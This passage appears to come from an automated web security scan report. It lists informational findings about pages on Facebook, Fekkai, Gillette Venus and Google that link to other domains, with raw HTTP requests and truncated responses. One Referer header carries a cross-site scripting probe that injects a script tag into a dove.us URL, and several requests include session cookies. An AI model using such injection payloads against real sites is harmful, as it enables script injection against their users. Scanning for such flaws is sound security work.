Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.215.54
X-Cnection: close
Date: Tue, 06 Sep 2011 16:45:46 GMT
Content-Length: 9560

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="kv9c";</scri
...[SNIP]...
</title><link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...

19.91. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx?ba088 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.119.27
X-Cnection: close
Date: Tue, 06 Sep 2011 16:53:41 GMT
Content-Length: 9048

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="Xzj2";</scri
...[SNIP]...
</title><link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/0ITpgsiVMtK.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/PFoOGI8L4YA.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/Sqr_RMyBDQm.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/ZxQqLwC16Cg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...

19.92. http://www.fekkai.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /?gclid=COTMo_SIiasCFQ6AgwodqEol4A HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Apache
Set-Cookie: fekkai_flash_intro_cookie=True; expires=Wed, 05-Sep-2012 16:45:37 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 16218
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...
</p>
           <a href="http://www.neimanmarcus.com/store/info/index.jhtml?navid=stores_footer" target="_blank" class="more">Find a Neiman Marcus Store</a>
...[SNIP]...
<!-- tracking pixel addition 02/01/2010 [begin] -->
<script type="text/javascript" src="http://action.mathtag.com/cnt?id=10384"></script>
...[SNIP]...
<li><a class="facebook" href="http://www.facebook.com/Fekkai?ref=search&amp;sid=23324090.1887069802..1" target="_blank">BECOME A FAN</a>
...[SNIP]...
</ul>
        <a href="http://www.bbbonline.org/cks.asp?id=292000103" target="_blank"><img src="/images/ico-by.gif" alt="ico-bbb" class="by" width="31" height="50" />
...[SNIP]...
<li><a href="http://www.pg.com/terms.htm" target="_blank">TERMS &amp; CONDITIONS</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/english/privacy_notice.html" target="_blank">SECURITY &amp; PRIVACY</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/optsengine/opts_engine_std_brandopts.jhtml?brand=Fekkai" target="_blank">UNSUBSCRIBE</a>
...[SNIP]...

19.93. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/buy_it_now/product_links.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /en_US/buy_it_now/product_links.jsp?upc=047400098978 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.2.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:34 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:34 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 1552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
</script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp" type="text/javascript"></script>
...[SNIP]...
</table>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.94. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/products/refillables/embrace_purple/index.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:32 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:32 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 81708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
<div id="quicknav">
<a href="http://www.facebook.com/gillettevenus" title="Facebook" target="_blank" ><img src="/en_US/images/facebook.png" alt="Facebook Image" >
...[SNIP]...
</span>

<a href="http://www.twitter.com/gillettevenus" target="_blank" title="Twitter" ><img src="/en_US/images/twitter.png" alt="Twitter" >
...[SNIP]...
<div class="flashBlockAltContent">
<a title="5 blades for a dramatically smooth shave" target="_blank" href="http://get.adobe.com/flashplayer/"><img src="/en_US/products/refillables/embrace_purple/images/FlashDetect_RazorHotspot.jpg" alt="5 blades for a dramatically smooth shave" />
...[SNIP]...
<div class="flashBlockAltContent">
<a title="Get Flash!" target="_blank" href="http://get.adobe.com/flashplayer/"><img src="/en_US/products/refillables/embrace/images/FlashDetect_RazorHotspot.jpg" alt="Get Flash!" />
...[SNIP]...
<div class="flashBlockAltContent">
<a title="Get Flash!" target="_blank" href="http://get.adobe.com/flashplayer/"><img src="/en_US/products/refillables/embrace_purple/images/FlashDetect_RazorHotspot.jpg" alt="Get Flash!" />
...[SNIP]...
<div class="flashBlockAltContent">
<a title="Get Flash!" target="_blank" href="http://get.adobe.com/flashplayer/"><img src="/en_US/products/zoom/FlashDetect_RazorHotspot.jpg" alt="Get Flash!" />
...[SNIP]...
<p class="notice"><a target="_blank" href="http://www.pg.com/privacy/english/privacy_notice.html">Privacy Policy</a>
...[SNIP]...
<li><a href="http://www.pg.com/terms.htm" target="_blank" class="">

Terms & Conditions</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/english/privacy_notice.html" target="_blank" class="">

Privacy Statement</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/optsengine/opts_engine_std_brandopts.jhtml?brand=venus" target="_blank" class="">

Unsubscribe</a>
...[SNIP]...
<!-- Begin: 4q.iperceptions.com -->


                                                <script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&amp;lID=1&amp;loc=4q-web2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.95. http://www.gillettevenus.com/en_US/search/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/search/index.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /en_US/search/index.jsp?q=razorphonehelpfaq HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/razor_finder/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; bvgacefRatingsAndReviews=true; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.5.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; preferredLocale=en_US

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:34 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:34 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 13622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<hea
...[SNIP]...
<div id="quicknav">
<a href="http://www.facebook.com/gillettevenus" title="Facebook" target="_blank" ><img src="/en_US/images/facebook.png" alt="Facebook Image" >
...[SNIP]...
</span>

<a href="http://www.twitter.com/gillettevenus" target="_blank" title="Twitter" ><img src="/en_US/images/twitter.png" alt="Twitter" >
...[SNIP]...
<li><a href="http://www.pg.com/terms.htm" target="_blank" class="">

Terms & Conditions</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/english/privacy_notice.html" target="_blank" class="">

Privacy Statement</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/optsengine/opts_engine_std_brandopts.jhtml?brand=venus" target="_blank" class="">

Unsubscribe</a>
...[SNIP]...
<!-- Begin: 4q.iperceptions.com -->


                                                <script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&amp;lID=1&amp;loc=4q-web2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.96. http://www.gillettevenus.com/global/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /global/blank.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /global/blank.html?bv=t&h=959&w=1266 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.2.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:34 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Mon, 28 Sep 2009 14:48:47 GMT
ETag: "239af8-69a-474a4652191c0"
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 1857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Blank</title>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.97. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:31:49 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 36439

BfyINKgQ....S.......0..J...#.....%s#...ATG e-commerce solutio.7$..55DxmTvT1PKPXiALn1sCWCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentNode;return b||google
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/products-services/#&..w..7,this.href,'','','','2','','0CGAQjBAwAQ')">Products & Services</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/solutions/mid-sized-business/s&m.._,this.href,'','','','3','','0CGUQjBAwAg')">Mid-sized Business</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/solutions/industry/consumer-business-services/s&m..    ,this.href,'','','','4','','0CGoQjBAwAw')">Consumer and Business Services</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/send-us-an-email/s&m...,this.href,'','','','5','','0CG8QjBAwBA')">Contact Us</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/about-atg/careers/s&m..",this.href,'','','','6','','0CHQQjBAwBQ')">Careers</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/customercare/s&m..",this.href,'','','','7','','0CHkQjBAwBg')">Customer Care/Login</a>
...[SNIP]...
<div style="border:0;padding:3px 8px 0 0"><img src="http://lh6.googleusercontent.com/-WAOI7yULaPU/AAAAAAAAAAI/AAAAAAAAAAA/uQrFDhietY0/s48-c-k/photo.jpg" alt="Klint Finley" height=48 style="vertical-align:middle" width=48></div>
...[SNIP]...

19.98. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:16 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 32222

BfyINKgQ....S..........7.........7s#...Direct Beauty Product.7$..5HE5mToH0NdHXiAKAxvGwCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentNode;return b||google.
...[SNIP]...
</a> - <a href="http://www.directbeautyproducts.com/ProductPicker.aspx?cat=1" onmousedown="return clk(this,this.href,'','','','3','','0CGoQ0gIoATAC')">Anti-Ageing &amp; Skin care</a> - <a href="http://www.directbeautyproducts.com/clearance.aspx" onmousedown="return clk(this,this.href,'','','','3','','0CGsQ0gIoAjAC')">Clearance</a> - <a href="http://www.directbeautyproducts.com/ProductPicker.aspx?cat=4" onmousedown="return clk(this,this.href,'','','','3','','0CGwQ0gIoAzAC')">Weight Loss &amp; Detoxing</a>
...[SNIP]...

19.99. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Harbottle+%26+Lewis HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 105544

<!doctype html> <head> <title>Harbottle &amp; Lewis - Google Search</title> <script>window.google={kEI:"nk1mTpOFD6LfiAL3u8SVCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttrib
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=Harbottle+%26+Lewis&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.harbottle.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CCEQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:_AGp_3uboA8J:www.harbottle.com/+Harbottle+%26+Lewis&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:_AGp_3uboA8J:www.harbottle.com/+Harbottle+%26+Lewis&cd=1&hl=en&ct=clnk&gl=us','','','','1','','0CCMQIDAA')">Cached</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.harbottle.com/hnl/pages/hnl_people.php" class=l onmousedown="return clk(this,this.href,'','','','2','','0CCgQjBAwAQ')">Our People</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.harbottle.com/hnl/pages/hnl_careers.php" class=l onmousedown="return clk(this,this.href,'','','','3','','0CC0QjBAwAg')">Careers</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.harbottle.com/hnl/pages/hnl_contact.php" class=l onmousedown="return clk(this,this.href,'','','','4','','0CDIQjBAwAw')">Contact Us</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.harbottle.com/hnl/upload/documents/PubFootball1.pdf" class=l onmousedown="return clk(this,this.href,'','','','5','','0CDcQjBAwBA')">Pub football and the future of <b>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://blog.harbottle.com/" class=l onmousedown="return clk(this,this.href,'','','','6','','0CDwQjBAwBQ')">Blog</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.harbottle.com/hnl/pages/hnl_about.php" class=l onmousedown="return clk(this,this.href,'','','','7','','0CEEQjBAwBg')">About Us</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Harbottle_%26_Lewis" class=l onmousedown="return clk(this,'http://en.wikipedia.org/wiki/Harbottle_%26_Lewis','','','','8','','0CEkQFjAH')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:CY2EQJrDvr4J:en.wikipedia.org/wiki/Harbottle_%2526_Lewis+Harbottle+%26+Lewis&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:CY2EQJrDvr4J:en.wikipedia.org/wiki/Harbottle_%2526_Lewis+Harbottle+%26+Lewis&cd=8&hl=en&ct=clnk&gl=us','','','','8','','0CEsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.guardian.co.uk/law/2011/jul/22/harbottle-lewis-waived-privilege" class=l onmousedown="return clk(this,this.href,'','','','9','','0CFAQFjAI')">How far can legal professional privilege go? | Neil Rose | Law <b>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:3G5e2SKm7gsJ:www.guardian.co.uk/law/2011/jul/22/harbottle-lewis-waived-privilege+Harbottle+%26+Lewis&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:3G5e2SKm7gsJ:www.guardian.co.uk/law/2011/jul/22/harbottle-lewis-waived-privilege+Harbottle+%26+Lewis&cd=9&hl=en&ct=clnk&gl=us','','','','9','','0CFIQIDAI')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.legalweek.com/legal-week/news/2107023/murdoch-wrong-blame-harbottle-ni-legal-director" class=l onmousedown="return clk(this,this.href,'','','','10','','0CFYQqQIwCQ')">Murdoch &#39;wrong&#39; to blame <em>
...[SNIP]...
<h3 class="r"><a href="http://www.telegraph.co.uk/news/uknews/phone-hacking/8666765/Phone-hacking-royal-law-firm-Harbottle-and-Lewis-in-negotiations-with-police-over-News-International-emails.html" class=l onmousedown="return clk(this,this.href,'','','','11','','0CF8QFjAK')">Phone hacking: royal law firm <em>
...[SNIP]...
<h3 class="r"><a href="http://www.legal500.com/firms/1467/offices/224" class=l onmousedown="return clk(this,this.href,'','','','12','','0CGUQFjAL')">The Legal 500 &gt; <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:BujBPvisv-kJ:www.legal500.com/firms/1467/offices/224+Harbottle+%26+Lewis&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:BujBPvisv-kJ:www.legal500.com/firms/1467/offices/224+Harbottle+%26+Lewis&cd=12&hl=en&ct=clnk&gl=us','','','','12','','0CGgQIDAL')">Cached</a>
...[SNIP]...
